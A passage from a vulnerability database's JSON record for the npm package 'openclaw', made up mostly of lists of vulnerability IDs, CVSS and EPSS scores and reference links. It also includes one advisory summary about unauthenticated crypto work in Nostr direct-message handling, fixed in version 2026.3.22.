yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35633","GHSA-4qwc-c7g9-4xcw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-816s-45wb-83ce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90791?format=json","vulnerability_id":"VCID-849r-t5j1-vue8","summary":"OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n## Summary\nNostr inbound DM handling could perform crypto and dispatch work before sender and pairing policy enforcement, enabling unauthorized pre-auth computation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `1ee9611079e81b9122f4bed01abb3d9f56206c77`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nostr/src/channel.ts now performs authorization before decrypting and dispatching inbound DM content.\n- extensions/nostr/src/nostr-bus.ts adds pre-crypto authorization, size, and rate guardrails before expensive decrypt work.\n\nOpenClaw thanks @kuranikaran for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30889","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30923","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30955","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35627"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"},{"reference_url":"https://github.com/advisories/GHSA-65h8-27jh-q8wv","reference_id":"GHSA-65h8-27jh-q8wv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-65h8-27jh-q8wv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35627","GHSA-65h8-27jh-q8wv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabili